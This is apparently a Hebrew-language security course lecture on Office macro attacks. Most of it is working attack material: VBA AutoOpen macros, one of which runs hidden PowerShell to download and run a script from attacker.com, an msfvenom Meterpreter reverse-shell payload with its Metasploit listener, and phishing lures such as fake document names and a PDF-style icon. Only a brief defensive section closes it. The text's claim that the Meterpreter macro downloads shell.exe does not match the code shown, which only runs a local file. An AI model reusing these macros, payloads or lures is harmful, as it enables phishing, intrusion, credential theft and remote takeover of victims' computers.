לדלג לתוכן

5.6 טכניקת Ofiice Macro Attack הרצאה

טכניקת Office Macro Attack

מאקרואים ב-Microsoft Office הם קוד VBA (Visual Basic for Applications) שנועדו להפוך משימות לאוטומטיות. עם זאת, ניתן לנצל אותם לצורך הרצת קוד זדוני על מערכת היעד, מה שהופך אותם לכלי נפוץ בהתקפות פישינג והפצת נוזקות.

כיצד מתקפת מאקרו עובדת?

  1. התוקף יוצר קובץ Word או Excel עם קוד VBA זדוני.

  2. הקורבן פותח את הקובץ ומאפשר הפעלת מאקרואים.

  3. הקוד מתבצע ברקע, ומאפשר:

    • הרצת פקודות PowerShell.

    • הורדת נוזקות מהרשת.

    • גניבת נתונים ושליחת קרדנציאליים לתוקף.

    • השגת גישה מלאה למערכת באמצעות Meterpreter או Reverse Shell.

כתיבת מאקרו זדוני ב-VBA

ניצור מאקרו VBA אשר מריץ פקודת cmd.exe:

Sub AutoOpen()
    Shell "cmd.exe /c calc.exe", vbNormalFocus
End Sub

  • AutoOpen – גורם למאקרו לרוץ אוטומטית בעת פתיחת הקובץ.

  • Shell "cmd.exe /c calc.exe" – מפעיל את המחשבון (calc.exe) כדי להדגים הרצת פקודה.

מאקרו להורדת והרצת Payload דרך PowerShell

Sub AutoOpen()
    Dim Str As String
    Str = "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command ""IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"""
    Shell Str, vbHide
End Sub

  • משתמש ב-PowerShell להורדת סקריפט מהרשת.

  • הסקריפט יכול להיות Meterpreter, Reverse Shell או כלי לגניבת סיסמאות.

יצירת מסמך Word עם מאקרו זדוני

  1. יצירת קובץ Word חדש.

  2. מעבר ל-DeveloperVisual Basic (או Alt + F11).

  3. יצירת מודול חדש והדבקת הקוד.

  4. שמירת המסמך בפורמט .docm (מאפשר מאקרואים).

יצירת מאקרו עם Meterpreter Reverse Shell

Sub AutoOpen()
    Shell "cmd.exe /c shell.exe", vbNormalFocus
End Sub

יצירת ה-Payload עם Metasploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attacker-IP> LPORT=4444 -f exe > shell.exe
python3 -m http.server 80  # הפעלת שרת HTTP לשיתוף הקובץ

האזנה לחיבור עם Metasploit

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Attacker-IP>
set LPORT 4444
exploit

כאשר הקורבן פותח את המסמך, המאקרו יוריד את shell.exe ויפעיל אותו, מה שיחבר את המערכת ל-Meterpreter.

טכניקות Social Engineering להגברת הסיכוי שהקורבן יפעיל מאקרו

  • מסמך רשמי מזויף: מייל עם קובץ הנושא כותרת כגון:

    • "דו"ח פיננסי סודי.docm"

    • "חוזה עבודה.docm"

    • "הוראות אבטחה.docm"

  • הודעה מזויפת במסמך:

    This document is protected. Enable Macros to view the content.

  • הפיכת האייקון של הקובץ לאייקון PDF כדי לגרום למשתמשים לפתוח אותו.

מניעת תקיפות מאקרו

  1. השבתת מאקרואים כברירת מחדל בקובצי Office:

    • FileOptionsTrust CenterMacro SettingsDisable all macros without notification

  2. הגבלת הרצת PowerShell ופקודות מסוכנות עם Applocker/GPO.

  3. שימוש ב-EDR או Defender ATP לאיתור מאקרואים חשודים.

  4. הגבלת הורדות PowerShell דרך Proxy ו-Firewall.